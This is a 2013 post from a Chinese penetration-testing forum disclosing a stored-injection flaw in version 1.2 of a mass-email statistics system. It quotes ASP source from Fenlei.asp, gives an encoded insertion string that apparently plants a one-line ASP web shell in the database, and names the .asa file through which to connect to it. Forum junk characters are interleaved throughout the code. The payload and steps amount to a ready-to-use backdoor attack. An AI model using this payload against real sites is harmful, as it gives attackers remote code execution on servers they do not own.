中国网络渗透测试联盟

标题: 铜板儿网邮件群发统计系统 v1.2 漏洞 [打印本页]

作者: admin    时间: 2013-3-14 20:14
标题: 铜板儿网邮件群发统计系统 v1.2 漏洞
'Fenlei.asp
- k; g+ f- {, a% h& l% t5 t
$ d0 Y# U: A: i$ A" y+ |IF Request.QueryString("Action")="del" Then 4 L  S& Z( k# Q) U
ID=Request.QueryString("ID")
) g" E1 A- b& G5 W! U4 V! SIF Countss ("tui","Fenlei",ID )<>0 then
. k' X) U1 K1 H. W6 _'略 # k1 z! t  q3 A0 T* w
IF Request.QueryString("Action")="Add" Then
% N4 D* @! }, Z2 cTname=Request.Form("Typename")
4 `; y4 M. D( ]; |- Q# q# ~7 z/ v# fSet Rs=Server.CreateObject("adodb.Recordset") 6 z- F9 @3 g" v: g. F, o# j
Sql="Select * From Fenlei Order by id Desc "
0 s' ]( J5 K5 U  J+ |2 r, CRs.Open Sql,Conn,1,3 & {. }& _+ `, n2 H3 U$ M7 Z/ W* n
Rs.Addnew
9 E" F) o& u+ i( `Rs("Typename")=Tname 6 b7 u+ y, {9 r
'略 ( ~6 C0 L6 _0 T" Q+ u3 n1 Y7 P
Set Rs=Server.CreateObject("adodb.Recordset")
* x3 p& n' ]% r( `Sql="Select * From Fenlei Order by id Desc " 3 q2 j% E* F3 Y& ^! A  @0 ^
Rs.Open Sql,Conn,1,1 + U4 H) F0 n- G" ]* b
'略
4 d( Z& ?7 A/ |; U%>9 y! K, T0 t0 y
7 ]" X5 C: H2 d$ l8 H

- @. K$ D/ P6 _$ f : J6 E* A1 t$ N0 d# O
没有过滤,直接写入数据库。  N2 h' p! S2 i. i2 Y. I
  D  J8 F! |5 q  ?
利用方法:
0 q. K! e+ }  s3 c* F! u4 A1 |
/ H! a9 @1 v, Y& \/ O% f/ B插入:┼攠數畣整爠煥敵瑳∨≡┩># y! i* t/ v) ~9 f. L/ U! E
- z8 T- @/ e' o- I5 n. Y
! H7 A& w2 P* G6 v2 C
连接: http://www.xxx.com/###tongbaner.asa
% j7 e6 p: u3 z9 ?  ~7 N'默认安装文件: ! s4 R3 }; A3 Q/ D6 Q! [
'install.asp: u  L' W: r; [( A! ?, q





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2